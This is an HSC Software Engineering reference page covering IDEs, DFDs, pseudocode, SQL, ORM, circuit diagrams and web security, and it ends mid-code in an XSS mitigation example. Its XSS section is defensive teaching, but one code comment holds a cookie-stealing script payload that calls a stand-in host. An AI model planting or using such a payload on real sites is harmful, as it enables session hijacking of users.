Course Tools & Specifications | HSC Software Engineering

Part 1 💻 Development Environment

💻 IDE & Development Tools

An Integrated Development Environment (IDE) combines a code editor, build tools, debugger, and other features into a single application. A plain text editor (e.g. Notepad, nano) only edits text — you must run all other tools separately.

⚖️ IDE vs Text Editor — Feature Comparison

Feature	Text Editor	IDE
Syntax highlighting	Basic / plugin	Built-in, language-aware
IntelliSense / autocomplete	Rarely	Yes — context-aware suggestions
Integrated debugger	No	Yes — breakpoints, watch variables
Refactoring tools	No	Yes — rename, extract, inline
Extensions / plugins	Limited	Large ecosystem
Integrated terminal	Rarely	Yes — run commands without leaving the editor
Version control integration	No	Yes — diff, commit, branch from sidebar
Linter / static analysis	Plugin only	Built-in or first-class plugin

🟦 VS Code — Setup for Python

Visual Studio Code is a lightweight, free IDE by Microsoft with a vast extension library. Recommended extensions for Python HSC work:

Python (ms-python): Provides IntelliSense, linting, debugging, and environment selection for Python files.

Pylance: Fast, feature-rich language server that powers type checking and smart autocomplete beyond the base Python extension.

GitLens: Enhances the built-in Git support — shows inline blame annotations, commit history, and file comparison.

JSON — .vscode/settings.json basics

{
  "editor.fontSize": 14,
  "editor.tabSize": 4,
  "editor.formatOnSave": true,
  "python.defaultInterpreterPath": "${workspaceFolder}/venv/bin/python",
  "python.linting.enabled": true,
  "python.linting.pylintEnabled": true,
  "editor.rulers": [79],
  "files.trimTrailingWhitespace": true
}

🐉 PyCharm — Setup for Python

PyCharm (JetBrains) is a full Python IDE with deeper analysis than VS Code. Key setup steps:

Project Interpreter: Set via File → Settings → Project → Python Interpreter. Create or select a virtual environment (venv) specific to your project so packages do not conflict.

Run Configurations: Defined in Run → Edit Configurations. Set the script path, working directory, and any environment variables. Allows one-click running or debugging of any file.

🔌 Arduino IDE

Used for programming Arduino microcontrollers (C/C++ dialect). Key features for HSC Mechatronics:

Boards Manager: Install support packages for different boards — accessed via Tools → Board → Boards Manager. Required for boards that are not covered by the default Arduino AVR package (e.g. ESP32).

Library Manager: Install third-party sensor and component libraries via Sketch → Include Library → Manage Libraries. Examples: Servo, DHT sensor library.

Serial Monitor: Opens a terminal showing data sent over the USB serial port via Serial.println(). Essential for debugging sensor readings and program state at runtime.

🐍 Thonny — MicroPython on Microcontrollers

Thonny is a beginner-friendly Python IDE designed for education and MicroPython development on boards like Raspberry Pi Pico and ESP32.

REPL (Read-Eval-Print Loop): An interactive shell at the bottom of Thonny. Type a Python expression and see the result instantly — useful for testing individual lines before adding them to a script.

File Transfer: The Files panel shows both your computer's filesystem and the microcontroller's filesystem side by side. Right-click a file and choose Upload to / to copy it to the board, or Download to retrieve it.

📋 IDE Features Summary Table

Feature	VS Code	PyCharm	Arduino IDE	Thonny
Autocomplete	Yes (Pylance)	Yes (built-in)	Limited	Basic
Syntax highlighting	Yes	Yes	Yes	Yes
Integrated debugger	Yes	Yes	Limited (IDE 2.x, supported boards only)	Yes (standard Python only)
Version control integration	Yes (Git)	Yes (Git)	No	No
Linter / static analysis	Yes (Pylint/Flake8)	Yes (built-in)	No	Limited
Refactoring	Basic	Advanced	No	No

Which IDE for which HSC task?

Use VS Code for general Python development, web programming tasks, and any project where you want Git integration without a heavyweight install.
Use PyCharm for larger Python projects that benefit from advanced refactoring and deeper type checking. The Community Edition is free; database tools are part of the paid Professional edition.
Use Arduino IDE for all Arduino-based mechatronics tasks — it handles board-specific compilation and serial communication.
Use Thonny for MicroPython on Raspberry Pi Pico or ESP32 — its built-in file transfer and REPL make deploying to the board fast and simple.

Part 2 🗺️ Design & Modelling

🗺️ System and Data Modelling Tools

📊 Data Flow Diagrams (DFD)

Used to represent the flow of data through an information system. DFDs show what data moves through a system and where it goes — not how or when.

⭕ Circle: Process — transforms input data into output (e.g. "Validate Login").

🗃️ Open Rectangle: Data Store — persistent storage such as a file or database table (e.g. "D1 Users").

🏢 Rectangle: External Entity — a person or system outside the boundary that sends or receives data (e.g. "Customer").

↩️ Arrow: Data Flow — named arrow showing data moving between elements (e.g. "username + password").

NESA Specification: Data Stores
While industry diagrams often use a cylinder for databases, NESA strictly requires Data Stores to be drawn as an open rectangle (two parallel horizontal lines) in HSC exams. Ensure you use this specific notation when drawing DFDs.

Level 0 (Context Diagram): Shows the entire system as a single process bubble with all external entities. No data stores or sub-processes are shown.

Level 1 DFD: Expands the single bubble into its major processes. Data stores appear at this level. Each process can be further expanded into a Level 2 DFD if needed.

Example scenario — Online Bookshop: A Customer (external entity) sends an order request (data flow) to the Process Order process, which reads from the D1 Book Catalogue (data store) and sends a confirmation (data flow) back to the Customer.

🏗️ Structure Charts

Represent a system's modular design — showing how subroutines are called from one another in a hierarchy. Modules at the top control modules below them.

▭ Rectangle: Module — a named subroutine or function (e.g. "Calculate Total").

🔘 Empty Circle Arrow: Data parameter — a data value passed between modules (e.g. passing a score).

⚫ Filled Circle Arrow: Control flag — a status variable passed between modules (e.g. a Boolean "isValid").

🔷 Diamond: Selection — indicates a module is called conditionally.

🔁 Curved Arrow: Repetition — indicates a module is called inside a loop.

Example: A top-level Main module calls GetInput, ProcessData, and DisplayResult. An arrow from GetInput back to Main carries the data parameter userScore.

Structure Chart — Online Bookshop (text notation)

MainModule
├── GetOrder          [🔘 orderDetails passed UP to MainModule]
│     ├── ValidateISBN      [⚫ isValid flag returned]
│     └── CheckStock        [⚫ stockAvailable flag returned]
├── ProcessPayment    [🔘 amount, 🔁 retry loop if payment fails]
│     ├── ChargeCard        [⚫ paymentSuccess flag returned]
│     └── SendReceipt       [🔘 email, orderID]
└── UpdateInventory   [🔘 ISBN, quantitySold]

Legend: 🔘 data parameter  ⚫ control flag  🔁 loop  ◇ conditional call

📋 Data Dictionary

A structured reference that documents every variable and data element in a system. Each entry includes: Name, Data Type, Format, Size, Description, Example value, and Validation rules.

Name	Data Type	Format	Size	Description	Example	Validation
`studentID`	Integer	XXXXXX	6 digits	Unique student identifier	482019	Must be 6 digits, not null
`surname`	String	Text	50 chars	Student's family name	Smith	Letters only, not empty
`score`	Real	###.#	4 bytes	Exam score out of 100	87.5	0.0 ≤ score ≤ 100.0
`dateOfBirth`	Date	DD/MM/YYYY	10 chars	Student's date of birth	14/03/2007	Valid calendar date
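
The Validation column can be turned into executable checks. The following is a minimal Python sketch of that idea, not a prescribed HSC approach: the function name `validate_student` and the choice to store a record as a dict are assumptions made for illustration, and the two sample records are invented.

```python
from datetime import datetime


def validate_student(record):
    """Return a list of rule violations for one record (empty list = valid)."""
    errors = []

    # studentID: an integer with exactly 6 digits
    student_id = record.get("studentID")
    if not isinstance(student_id, int) or not (100000 <= student_id <= 999999):
        errors.append("studentID must be a 6-digit integer")

    # surname: letters only, not empty, at most 50 characters
    surname = record.get("surname")
    if not isinstance(surname, str) or not surname.isalpha() or len(surname) > 50:
        errors.append("surname must be 1-50 letters")

    # score: a number from 0.0 to 100.0 inclusive
    score = record.get("score")
    if not isinstance(score, (int, float)) or not (0.0 <= score <= 100.0):
        errors.append("score must be between 0.0 and 100.0")

    # dateOfBirth: a real calendar date in day/month/year order
    try:
        datetime.strptime(str(record.get("dateOfBirth")), "%d/%m/%Y")
    except ValueError:
        errors.append("dateOfBirth must be a valid DD/MM/YYYY date")

    return errors


# Invented sample records: one valid, one that breaks every rule
good = {"studentID": 482019, "surname": "Smith", "score": 87.5, "dateOfBirth": "14/03/2007"}
bad = {"studentID": 4820, "surname": "", "score": 120, "dateOfBirth": "31/02/2007"}

print(validate_student(good))
print(validate_student(bad))
```

Returning a list of messages rather than a single True/False lets the program report every problem in a record at once.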

🧩 Class Diagrams

Used in object-oriented design to show classes, their attributes, methods, and the relationships between them. Each class is drawn as a box divided into three compartments.

Class Diagram — Example

┌─────────────────────┐
│       Student       │  ← Class name
├─────────────────────┤
│ - studentID: int    │  ← Attributes (- private, + public)
│ - name: String      │
│ - score: float      │
├─────────────────────┤
│ + getScore(): float │  ← Methods
│ + setScore(s: float)│
│ + isPassing(): bool │
└─────────────────────┘

     Student ──────▷ Person      (Inheritance: Student extends Person)
     Course  ◆───── Lesson       (Composition: Course owns its Lessons)
     Student ──────  Course      (Association: Student enrols in Course)

— (solid line): Association — a general relationship between two classes.

▷ (open arrow): Inheritance — a subclass extends a superclass (is-a relationship).

◇ (open diamond): Aggregation — a "has-a" relationship; parts can exist independently.

◆ (filled diamond): Composition — parts cannot exist without the whole (strong ownership).
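
To show how the three compartments of the Student box translate into code, here is one possible Python rendering. It is a sketch under assumptions: Python has no true private attributes, so the leading underscore stands in for the "-" marker; the method names are converted to snake_case; and the pass mark of 50 is taken from the pass/fail examples elsewhere in these notes.

```python
class Student:
    """One possible Python version of the Student class in the diagram."""

    PASS_MARK = 50  # assumed pass mark

    def __init__(self, student_id, name, score=0.0):
        # Attributes compartment: a leading underscore marks "private by convention"
        self._student_id = student_id
        self._name = name
        self._score = float(score)

    # Methods compartment: the public (+) operations
    def get_score(self):
        return self._score

    def set_score(self, s):
        self._score = float(s)

    def is_passing(self):
        return self._score >= self.PASS_MARK


student = Student(482019, "Smith", 87.5)
print(student.get_score(), student.is_passing())
student.set_score(43)
print(student.get_score(), student.is_passing())
```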

🖼️ Storyboard

A visual sequence of annotated screen layouts showing the user's journey through a system. Created in the design phase before any code is written, storyboards allow stakeholders to review and approve the interface before development begins.

Each frame in a storyboard typically includes:

A sketch or wireframe of the screen layout
The screen name or state (e.g. "Login Screen", "Results Page")
Navigation arrows showing what triggers the transition to the next screen (e.g. "Click Submit")
Notes on input fields, buttons, and displayed data

Design phase: Storyboards belong to the Design phase of the SDLC. Getting the client's approval of the interface and user flow at this stage avoids costly rework later. For the HSC project, a storyboard typically shows 4–8 frames, including a home/login screen, a main feature screen, an input form, and a results/output screen.

🌳 Decision Trees

A tree-based diagram that models decision logic. Starting from a root condition, each branch represents a possible outcome of a test. Decision trees are useful for representing complex nested logic clearly.

Decision Tree — Exam Grade Example

Is score ≥ 90?
├── YES → Grade: A
└── NO
    Is score ≥ 75?
    ├── YES → Grade: B
    └── NO
        Is score ≥ 50?
        ├── YES → Grade: C
        └── NO → Grade: Fail
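
Each test in the tree becomes one condition in code, and each NO branch becomes the next nested check. A short Python sketch of the tree above follows; the function name `grade_for` is hypothetical.

```python
def grade_for(score):
    """Walk the exam-grade decision tree from the root down."""
    if score >= 90:              # root test
        return "A"
    else:
        if score >= 75:          # reached only when the root test answered NO
            return "B"
        else:
            if score >= 50:
                return "C"
            else:
                return "Fail"


for sample in (95, 80, 62, 31):
    print(sample, grade_for(sample))
```

The nesting is kept deliberately so the code lines up with the branches of the tree; in everyday Python the same logic is usually flattened with `elif`.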

📋 Project Management Tools

📈 Gantt Charts

A horizontal bar chart that displays all project tasks against a timeline, making it easy to see what needs to happen, in what order, and how long each task should take.

Task	Week 1	Week 2	Week 3	Week 4	Depends on
Requirements analysis	████				—
Design (DFD, structure chart)	░░	████			Requirements
Coding		░░	████	░░	Design
Testing			░░	████	Coding

Task bars: Horizontal bars showing the planned start, duration, and end of each task.

Dependencies: Arrows or indentation indicating which tasks must finish before another can begin.

Milestones: Key checkpoints (often shown as a diamond ◆) marking a significant completion point.

Critical path: The sequence of dependent tasks that determines the minimum project duration.
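
The critical path can be found by working out the earliest time each task can finish, given its dependencies. The sketch below illustrates this in Python. The durations (in weeks) are invented, and "User guide" is a hypothetical extra task added only so that there is a parallel branch to compare against; neither comes from the chart above.

```python
from functools import lru_cache

# task name -> (duration in weeks, tasks that must finish first)
TASKS = {
    "Requirements": (1, []),
    "Design": (1, ["Requirements"]),
    "Coding": (2, ["Design"]),
    "User guide": (1, ["Design"]),   # hypothetical task running alongside Coding
    "Testing": (1, ["Coding"]),
}


@lru_cache(maxsize=None)
def earliest_finish(task):
    """A task starts when its slowest dependency has finished."""
    duration, depends_on = TASKS[task]
    start = max((earliest_finish(d) for d in depends_on), default=0)
    return start + duration


def critical_path():
    """Walk back from the last task to finish, following the latest dependency."""
    task = max(TASKS, key=earliest_finish)
    path = [task]
    while TASKS[task][1]:
        task = max(TASKS[task][1], key=earliest_finish)
        path.append(task)
    return list(reversed(path))


print("Minimum duration (weeks):", max(earliest_finish(t) for t in TASKS))
print("Critical path:", " -> ".join(critical_path()))
```

With these made-up numbers, "User guide" is not on the critical path: delaying it by a week would not delay the project, whereas delaying any task on the path would.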

📝 Process Diaries / Log Books

A regular written record kept throughout the project. Entries are made at consistent intervals (e.g. after each work session, weekly, or at each milestone) and serve as evidence of the development process.

A typical log entry includes:

Date and time of the session
Tasks completed — what was achieved
Obstacles encountered — bugs, design problems, or blockers
Next steps — what will be attempted in the next session
Reflective comments — what was learned or what could be improved

Process Diary — Example Entry

Date: 14 March 2025    Session duration: 90 minutes

Tasks completed:
  - Implemented the login form with input validation (Python / Flask)
  - Updated Gantt chart: testing phase pushed back 2 days

Stumbling blocks:
  - The input sanitisation function was stripping "+" characters from
    valid email addresses (e.g. user+tag@example.com)

Solutions applied:
  - Updated the regex to r'^[\w.+\-]+@[\w\-]+\.[\w.]+$'
  - Verified against RFC 5321 which confirms "+" is legal in the local part

Next steps:
  - Write unit tests for the validate_email() function
  - Begin designing the database schema

Reflective comment:
  - This bug took longer than expected. In future I should test
    edge cases during coding rather than discovering them in testing.

In the HSC Software Engineering Project, your process diary is submitted as evidence of your development approach and is assessed alongside your final solution.

Part 3 ⌨️ Core Programming

⌨️ Programming Paradigms

A programming paradigm is a fundamental style or approach to solving problems with code. Different paradigms suit different types of problems.

🧩 Object-Oriented

Organises code into classes and objects. Key concepts: attributes, methods, inheritance, polymorphism, and encapsulation. Used in Python, Java, C#.

class Dog:
    def __init__(self, name):
        self.name = name
    def bark(self):
        return "Woof!"

📝 Logic

Programs are expressed as facts and rules; the engine finds solutions automatically. Used in Prolog for AI and expert systems.

% Prolog-style logic
parent(tom, bob).
parent(bob, ann).
grandparent(X, Z) :-
    parent(X, Y), parent(Y, Z).

🖥️ Imperative

Programs describe how to do something as a sequence of commands — control structures, assignment, expressions, and subroutines. Most common paradigm; used in Python, C, Pascal.

total = 0
for i in range(1, 6):
    total = total + i
print(total)  # 15

⚙️ Functional

Treats computation as evaluating functions. Avoids changing state; uses recursion and first-class functions. Used in Haskell, Erlang; supported in Python.

# Python functional style
nums = [1, 2, 3, 4, 5]
total = sum(map(lambda x: x*2, nums))
print(total)  # 30

📝 Algorithms

An algorithm is a precise, step-by-step set of instructions for solving a problem. In HSC Software Engineering, algorithms are communicated using pseudocode or flowcharts.

💻 Pseudocode

A structured English-like notation for expressing algorithms. It is not executable code — it communicates logic without worrying about syntax. NSW HSC conventions:

Keywords in CAPITALS (e.g. IF, WHILE, FOR)
Structural keywords come in matched pairs: IF / ENDIF, WHILE / ENDWHILE, BEGIN / END
Indent the body of every control structure
Use ← for assignment (e.g. total ← 0)

Pseudocode — Find the largest number in a list

BEGIN
  INPUT numbers        # A list of numbers entered by the user
  largest ← numbers[0]
  FOR i = 1 TO LENGTH(numbers) - 1
    IF numbers[i] > largest THEN
      largest ← numbers[i]
    ENDIF
  NEXT i
  OUTPUT "Largest value: ", largest
END
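
For comparison, the same algorithm can be written in Python almost line for line. This is an illustrative translation only; the function name `find_largest` and the sample list are assumptions, and the function expects a non-empty list.

```python
def find_largest(numbers):
    """Return the largest value in a non-empty list."""
    largest = numbers[0]                  # largest ← numbers[0]
    for i in range(1, len(numbers)):      # FOR i = 1 TO LENGTH(numbers) - 1
        if numbers[i] > largest:
            largest = numbers[i]
    return largest


print("Largest value:", find_largest([12, 45, 7, 45, -3]))
```

Starting from the first element, rather than from 0, means the result is still correct when every number in the list is negative.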

🌊 Flowcharts

A visual diagram using standardised shapes connected by arrows to show the flow of logic through an algorithm.

🔵 OvalTerminator — marks the Start or End of the algorithm.

📐 ParallelogramInput/Output — data entering (INPUT) or leaving (OUTPUT/DISPLAY) the system.

▭ RectangleProcess — a computation, assignment, or action (e.g. total ← total + score).

🔶 DiamondDecision — a yes/no or true/false branch (e.g. score ≥ 50?).

🗂️ Double-sided RectangleSubprogram — a call to a named subroutine or function.

Flowchart — Find the largest number in a list (text diagram)

        ╔══════════╗
        ║  START   ║   ← Oval terminator
        ╚════╤═════╝
             │
     ╔═══════╧════════╗
     ║  largest ← 0   ║   ← Process rectangle (assumes no number is negative)
     ║  i ← 0         ║      i counts numbers read; n = how many will be entered
     ╚═══════╤════════╝
             │
     ╔═══════╧════════╗
     ║  INPUT number  ║   ← Parallelogram (input)
     ╚═══════╤════════╝
             │
        ╔════╧═════╗
        ║ number > ║   ← Diamond (decision)
        ║ largest? ║
        ╚═╤══════╤═╝
       YES│      │NO
          ▼      │
  ╔═══════════╗  │
  ║ largest ← ║  │   ← Process
  ║  number   ║  │
  ╚═════╤═════╝  │
        └────────┘
             │
     ╔═══════╧════════╗
     ║  i ← i + 1     ║   ← Process (count the number just read)
     ╚═══════╤════════╝
             │
        ╔════╧═════╗
        ║  i < n?  ║   ← Loop back if more numbers remain
        ╚═╤══════╤═╝
       YES│      │NO
          │      ▼
          │  ╔══════════════╗
          │  ║ OUTPUT       ║   ← Parallelogram (output)
          │  ║ largest      ║
          │  ╚══════╤═══════╝
          │         │
          │    ╔════╧═════╗
          │    ║   END    ║   ← Oval terminator
          │    ╚══════════╝
          │
     (loop back to INPUT)

Pseudocode vs Flowcharts: Both express the same algorithm. Pseudocode is preferred for complex logic and is easier to convert to code. Flowcharts are better for visualising branching and communicating with non-programmers.

🕹️ Control Structures

Control structures determine the order in which instructions execute. Every algorithm is built from three fundamental building blocks: Sequence, Selection, and Repetition.

➡️ Sequence

The default mode — statements execute one after another, top to bottom, in the exact order they are written. No branching or repetition occurs.

Pseudocode — Calculate a student's average

BEGIN
  INPUT score1
  INPUT score2
  INPUT score3
  total ← score1 + score2 + score3
  average ← total / 3
  OUTPUT "Average score: ", average
END

🔀 Selection

Allows the program to choose between different paths based on a condition.

2️⃣ Binary Selection

Chooses between exactly two outcomes: one path if the condition is true, another if it is false.

Pseudocode — Pass or fail

IF score >= 50 THEN
  OUTPUT "Result: Pass"
ELSE
  OUTPUT "Result: Fail"
ENDIF

🔢 Multi-way Selection

Selects from several possible outcomes based on a single expression's value. More readable than a chain of IF/ELSE IF.

Pseudocode — Menu selection

CASEWHERE menuChoice equals
  1: OUTPUT "New Game"
  2: OUTPUT "Load Game"
  3: OUTPUT "High Scores"
  OTHERWISE: OUTPUT "Invalid choice"
ENDCASE

🪆 Nested IF

An IF structure placed inside another IF. Used when a decision depends on the result of a previous decision.

Pseudocode — Grade with distinction check

IF score >= 50 THEN
  IF score >= 85 THEN
    OUTPUT "Grade: A (Distinction)"
  ELSE
    OUTPUT "Grade: Pass"
  ENDIF
ELSE
  OUTPUT "Grade: Fail — please see your teacher"
ENDIF

🔁 Repetition

Allows a block of statements to execute multiple times. The choice of loop depends on whether the number of iterations is known in advance.

⬆️ Pre-test (WHILE)

Checks the condition before each iteration. If the condition is false from the start, the body never executes.

Pseudocode — Validate user input

INPUT password
WHILE password != "correct123"
  OUTPUT "Incorrect password. Try again."
  INPUT password
ENDWHILE
OUTPUT "Access granted."

⬇️ Post-test (REPEAT / UNTIL)

Checks the condition after each iteration. The body always executes at least once.

Pseudocode — Keep asking until valid input

REPEAT
  OUTPUT "Enter a number between 1 and 10: "
  INPUT number
UNTIL number >= 1 AND number <= 10
OUTPUT "You entered: ", number
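
Python has no built-in post-test loop, so REPEAT / UNTIL is usually written as `while True` with an exit at the bottom of the body. The sketch below shows that pattern. The function name `read_number_in_range` and the `read_line` parameter are assumptions; in a real program you would pass the built-in `input` as `read_line`.

```python
def read_number_in_range(read_line, low=1, high=10):
    """Keep asking until a whole number from low to high is supplied."""
    while True:                              # REPEAT: the body always runs at least once
        text = read_line(f"Enter a number between {low} and {high}: ")
        if text.strip().isdigit():           # ignore anything that is not a whole number
            number = int(text)
            if low <= number <= high:        # UNTIL number >= low AND number <= high
                return number


# Scripted answers stand in for the keyboard so the example runs unattended
answers = iter(["0", "abc", "11", "7"])
print("You entered:", read_number_in_range(lambda prompt: next(answers)))
```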

🔢 FOR / NEXT (Counted Loop)

Used when the number of iterations is known in advance. The loop variable is automatically incremented each cycle.

Pseudocode — Sum five scores

total ← 0
FOR i = 1 TO 5 STEP 1
  INPUT score
  total ← total + score
NEXT i
average ← total / 5
OUTPUT "Class average: ", average

Choosing the right loop: Use FOR/NEXT when the count is known. Use WHILE when checking a condition before starting. Use REPEAT/UNTIL when the body must run at least once (e.g. input validation).

🔧 Subroutines

A subroutine is a named, reusable block of code that performs a specific task. Subroutines promote modularity — breaking a large problem into smaller, manageable pieces.

Procedure vs Function: A procedure (subroutine) performs an action but does not return a value. A function performs a calculation and returns a result to the caller.

🔧 Using a Subroutine with One Parameter

A parameter is a variable that receives a value when the subroutine is called. The value passed in is called an argument.

Pseudocode — Display a greeting

SUBROUTINE greetStudent(studentName)
  OUTPUT "Welcome, ", studentName, "!"
  OUTPUT "Good luck with your HSC."
END SUBROUTINE

# Calling the subroutine:
greetStudent("Alice")
greetStudent("Ben")

⚙️ Using a Subroutine with Multiple Parameters

Multiple parameters are separated by commas. Each argument passed must match the corresponding parameter in position and type.

Pseudocode — Print a student result

SUBROUTINE displayResult(studentName, score)
  OUTPUT studentName, " scored ", score, "/100"
  IF score >= 50 THEN
    OUTPUT "Result: Pass"
  ELSE
    OUTPUT "Result: Fail"
  ENDIF
END SUBROUTINE

# Calling the subroutine:
displayResult("Alice", 87)
displayResult("Ben", 43)

↩️ Passing a Value Back from a Function

A function uses RETURN to send a computed value back to the line that called it. The returned value can be stored in a variable or used directly in an expression.

Pseudocode — Calculate letter grade

FUNCTION getGrade(score)
  IF score >= 90 THEN
    RETURN "A"
  ELSE IF score >= 75 THEN
    RETURN "B"
  ELSE IF score >= 50 THEN
    RETURN "C"
  ELSE
    RETURN "Fail"
  ENDIF
END FUNCTION

# Calling the function:
grade ← getGrade(82)
OUTPUT "Your grade is: ", grade    # Your grade is: B

Part 4 🗄️ Data, Systems & Specialist Topics

🗄️ Relational Databases

🗄️ SQL

Structured Query Language (SQL) is the standard language for interacting with relational databases. A relational database stores data in tables (relations), where each row is a record and each column is a field.

SQL — Standard Syntax

SELECT field(s)
FROM table(s)
WHERE search criteria
GROUP BY field(s)
ORDER BY field(s) ASC/DESC

SQL — Worked Examples

-- Get all students with a score above 80, sorted highest first
SELECT studentID, surname, score
FROM Students
WHERE score > 80
ORDER BY score DESC;

-- Count how many students passed each subject
-- (Enrolments stores subjectID, matching the join example)
SELECT subjectID, COUNT(*) AS numPassing
FROM Enrolments
WHERE score >= 50
GROUP BY subjectID
ORDER BY numPassing DESC;

-- Join two tables: get student names with their subject enrolments
SELECT Students.surname, Subjects.subjectName, Enrolments.score
FROM Students
JOIN Enrolments ON Students.studentID = Enrolments.studentID
JOIN Subjects ON Enrolments.subjectID = Subjects.subjectID
WHERE Enrolments.score >= 50;

SUM / AVG / COUNT / MAX / MIN: Aggregate functions that operate on a set of rows (e.g. AVG(score)).

AND / OR / NOT: Logical operators to combine conditions in a WHERE clause.

JOIN: Combines rows from two or more tables based on a matching key field.

PRIMARY KEY: A field (or combination) that uniquely identifies each row in a table.

FOREIGN KEY: A field in one table that references the primary key of another, creating a relationship.
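
To try these ideas without installing a database server, Python's built-in `sqlite3` module can run SQL against a temporary in-memory database. The sketch below is illustrative: the table layout follows the join example above, but the column types and all of the sample rows are invented.

```python
import sqlite3

conn = sqlite3.connect(":memory:")   # temporary database, discarded on exit
conn.executescript("""
    CREATE TABLE Students (studentID INTEGER PRIMARY KEY, surname TEXT);
    CREATE TABLE Subjects (subjectID INTEGER PRIMARY KEY, subjectName TEXT);
    CREATE TABLE Enrolments (
        studentID INTEGER REFERENCES Students(studentID),  -- foreign key
        subjectID INTEGER REFERENCES Subjects(subjectID),  -- foreign key
        score     REAL,
        PRIMARY KEY (studentID, subjectID)                 -- composite primary key
    );
    INSERT INTO Students VALUES (482019, 'Smith'), (482020, 'Nguyen');
    INSERT INTO Subjects VALUES (1, 'Software Engineering'), (2, 'Mathematics');
    INSERT INTO Enrolments VALUES (482019, 1, 87.5), (482019, 2, 45.0), (482020, 1, 62.0);
""")

# JOIN: follow the foreign keys to combine the three tables
rows = conn.execute("""
    SELECT Students.surname, Subjects.subjectName, Enrolments.score
    FROM Students
    JOIN Enrolments ON Students.studentID = Enrolments.studentID
    JOIN Subjects ON Enrolments.subjectID = Subjects.subjectID
    WHERE Enrolments.score >= 50
    ORDER BY Enrolments.score DESC
""").fetchall()

# Aggregate functions: summarise the passing enrolments in a single row
summary = conn.execute(
    "SELECT COUNT(*), MAX(score) FROM Enrolments WHERE score >= 50"
).fetchone()

for row in rows:
    print(row)
print(summary)
```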

🔗 Object-Relational Mapping (ORM)

ORM is a programming technique that allows a developer to interact with a relational database using objects rather than raw SQL. The ORM framework automatically generates the SQL behind the scenes.

Class → Table: Each class in the object model corresponds to a database table.

Attribute → Column: Each attribute of the class becomes a column in the table.

Object → Row: Each instance of the class is stored as a row (record) in the table.

Python — ORM-style example (SQLAlchemy)

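from sqlalchemy import Column, Float, Integer, String, create_engine
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

# The class maps directly to the "students" database table
class Student(Base):
    __tablename__ = 'students'
    studentID = Column(Integer, primary_key=True)
    surname   = Column(String(50))
    score     = Column(Float)

# In-memory SQLite database, used here only so the example runs on its own
engine = create_engine('sqlite:///:memory:')
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

# Query using objects instead of SQL strings
passing = session.query(Student).filter(Student.score >= 50).all()
for s in passing:
    print(s.surname, s.score)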

🦾 Wiring Diagrams for Mechatronic Systems

Wiring diagrams use standardised schematic symbols to represent electronic components and their connections. They show how components are electrically connected in a circuit — different from a physical layout diagram.

⚡ Resistor

Limits current flow. Shown as a rectangle or zigzag line. Value measured in Ohms (Ω).

🔋 Capacitor

Stores electrical charge temporarily. Shown as two parallel lines. Value in Farads (F).

➡️ Diode / LED

Allows current to flow in one direction only. LED emits light when conducting. Shown as a triangle pointing to a line.

🔌 Voltage Source

Provides electrical potential. DC shown as long/short parallel lines; AC shown as a circle with a wave symbol.

🔊 Speaker / Motor

Output transducers — convert electrical energy to sound (speaker) or mechanical motion (motor).

🧩 Integrated Circuit (IC)

A chip containing many transistors and logic gates. Shown as a rectangle with labelled input/output pins.

Tracing a circuit — LED with current-limiting resistor:

+5V → [Resistor 220Ω] → [LED Anode (+)] → [LED Cathode (−)] → GND

In wiring diagrams, always trace from the positive supply (VCC/5V) through each component in series to ground (GND). The resistor limits current so the LED doesn't burn out (LEDs typically need 20mA at 2V forward voltage; at 5V supply: R = (5 − 2) / 0.02 = 150Ω minimum — 220Ω is the standard safe choice).

In Arduino projects: digital output pin → resistor → LED → GND. When the pin outputs HIGH (5V), current flows and the LED illuminates.
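
The resistor calculation above is Ohm's law applied to the voltage left over after the LED's forward drop. The short Python sketch below repeats the arithmetic; the function name `min_series_resistor` is hypothetical, and the figures are the typical values quoted above rather than datasheet values for a particular LED.

```python
def min_series_resistor(supply_v, forward_v, max_current_a):
    """R = (V_supply - V_forward) / I, the smallest safe series resistance in ohms."""
    return (supply_v - forward_v) / max_current_a


# 5 V supply, 2 V forward voltage, 20 mA maximum LED current
r_min = min_series_resistor(5.0, 2.0, 0.020)
print("Minimum resistance (ohms):", round(r_min))

# Current that actually flows with the usual 220 ohm resistor, in milliamps
current_ma = (5.0 - 2.0) / 220 * 1000
print("Current with 220 ohms (mA):", round(current_ma, 1))
```

A larger resistor than the minimum lowers the current, so the LED is slightly dimmer but has a safety margin.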

🌐 Programming for the Web

🖼️ Front-end Web Development Frameworks

Front-end frameworks provide pre-built, reusable components and a structured approach to building user interfaces in the browser. Rather than writing all HTML/CSS/JS from scratch, developers compose interfaces from components.

React: A JavaScript library by Meta for building component-based UIs. Uses a virtual DOM for efficient updates.

Vue: A progressive framework that is lightweight and easy to integrate into existing projects.

Angular: A full framework by Google that includes routing, state management, and dependency injection built in.

Framework vs Library: A library (like React) is called by your code when you need it. A framework (like Angular) calls your code — it provides the overall structure and you fill in the details.

🛡️ Cross-site Scripting (XSS)

XSS is a web security vulnerability where an attacker injects malicious client-side scripts into web pages that other users then view. The injected script runs in the victim's browser with the same trust level as the legitimate site.

Attack scenario: A forum site displays user comments without sanitising them. An attacker posts a comment containing a <script> tag. Every visitor who loads the page runs the script in their own browser — the attacker can steal session cookies, redirect users, or log keystrokes.

XSS — Vulnerable vs Safe output (Python Flask)

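from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)  # the route paths below are illustrative

# VULNERABLE — user input rendered directly as HTML:
@app.route('/comment-unsafe', methods=['POST'])
def post_comment_unsafe():
    comment = request.form['comment']
    return f"<p>{comment}</p>"
# If comment = <script>document.location='https://evil.com?c='+document.cookie</script>
# → every visitor's cookie is sent to the attacker

# SAFE — escape special characters before rendering:
@app.route('/comment-safe', methods=['POST'])
def post_comment_safe():
    comment = request.form['comment']
    return f"<p>{escape(comment)}</p>"
# <script> becomes &lt;script&gt; — displayed as text, never executed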

Mitigation checklist: (1) Escape output — convert < > & " ' to HTML entities before rendering any user-supplied content.
(2) Validate input server-side — reject input that doesn't match an expected format or whitelist.
(3) Content Security Policy (CSP) — set a response header restricting which scripts may execute on your page.

Escaping output: Convert special characters (< > & " ') to HTML entities so they render as text rather than being parsed as markup.

Input validation: Reject or sanitise input that doesn't match expected formats on the server side (never rely on client-side validation alone).

Content Security Policy: An HTTP response header that tells the browser which sources of script are trusted — blocking injected inline scripts even if they reach the page.
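
The three mitigations can be sketched with the Python standard library alone, independent of any web framework. Everything named here is an assumption for illustration: the username rule (3 to 20 letters, digits or underscores), the function names, and the particular policy string, which is just one common starting point.

```python
import html
import re

# Input validation: accept only values matching an expected pattern (assumed rule)
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_]{3,20}")


def is_valid_username(text):
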